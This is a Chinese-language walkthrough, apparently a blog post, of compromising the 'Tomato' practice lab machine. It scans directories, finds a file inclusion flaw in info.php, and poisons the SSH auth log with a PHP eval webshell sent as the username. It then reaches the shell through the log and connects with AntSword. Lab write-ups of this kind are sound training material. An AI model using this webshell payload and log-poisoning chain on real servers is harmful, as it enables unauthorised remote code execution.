当前位置: 首页 > news >正文

TOMATO靶机漏洞复现

步骤一,我们来到tomato页面

什么也弄不了只有一番茄图片

弱口令不行,xxs也不行,xxe还是不行

我们来使用kali来操作...

步骤二,使用dirb再扫一下, dirb http://172.16.1.133

1.发现这个文件可以访问.我们来访问一下

/antibot_image/

2.我们来看看他文件里面有什么东西是我们可以利用的!

3.找到网站绝对路径 info.php我们来点击进去

4.查看页面源代码 可以发现image的文件包含.

5.在info.php后面输入?image=/etc/passwd显示成功,说明存在文件包含漏洞

最下边

步骤三,将一句话木马作为ssh登录的用户名登录

1.输入

ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

2.页面通过image传参查看日志文件

/var/log/auth.log

这个很阁僚...一开始有中间有下边还有,不过我问了一下说有就行了

发现多了一些报错信息,大概率写入木马成功.

步骤四,直接使用蚁剑进行连接:

http://172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log

密码:cmd

连接成功

http://www.lryc.cn/news/430663.html

相关文章:

  • 高基数 GroupBy 在 SLS SQL 中的查询加速
  • TP5队列和TP5 使用redis 等相关
  • 【R语言速通】1.数据类型
  • 【C++设计模式】(三)创建型模式:单例模式
  • 基于Android Studio的行程记录APK开发指南(三)---界面设计及两种方法获取用户位置
  • 大厂趋势:低代码不等于低能力,赋能高效开发新纪元
  • CentOS全面停服,国产化提速,央国企信创即时通讯/协同门户如何选型?
  • 如何确定Kubernetes是在采用哪种方式进行部署的?
  • 【PostgreSQL】地理空间数据的数据类型定义、索引优化、查询优化策略
  • RocketMQ广播消费消息
  • C#基础(2)枚举
  • Linux之MySQL日志
  • Redis集群模式—主从集群、哨兵集群、分片集群
  • 并发工具类(二):CyclicBarrier
  • Spring Cloud全解析:负载均衡之Ribbon简介
  • Kettle安装与使用指南
  • 教育行业解决方案:智能PPT在教育行业的创新应用
  • Matlab程序练习
  • cesium可不可以改变影像底图颜色,如何给地球底图影像添加一层滤镜蒙版?
  • MyBatis-MappedStatement什么时候生成?QueryWrapper如何做到动态生成了SQL?
  • Netty系列-2 NioServerSocketChannel和NioSocketChannel介绍
  • 智能客服的四大优势,提升企业服务效率
  • AutoGPT开源项目解读
  • Linux离线安装fontconfig
  • 海山数据库(He3DB)+AI:(一)神经网络基础
  • CSS中选择器有哪些?(史上最全选择器)
  • 本地部署 AI 智能体,Dify 搭建保姆级教程(下):知识库 RAG + API 调用,我捏了一个红楼解读大师
  • HarmonyOS应用开发者高级认证,Next版本发布后最新题库 - 答案纯享版
  • 基于PHP的文件包含介绍
  • K7系列FPGA多重启动(Multiboot)